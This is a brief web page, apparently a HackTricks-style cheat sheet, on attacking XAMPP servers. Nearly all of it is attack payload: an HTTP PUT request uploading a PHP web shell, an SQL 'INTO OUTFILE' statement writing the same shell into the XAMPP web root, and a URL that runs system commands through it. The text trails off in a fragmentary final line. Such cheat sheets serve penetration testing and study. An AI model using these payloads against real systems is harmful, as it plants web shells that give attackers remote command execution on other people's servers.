Ir para o conteúdo

Hacktricks — Xampp

PUT /test.txt HTTP/1.1 Content-Type: text/plain <?php system($_GET['cmd']); ?>

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:/xampp/htdocs/shell.php" Then access: http://target/shell.php?cmd=whoami If enabled (common on older XAMPP): xampp hacktricks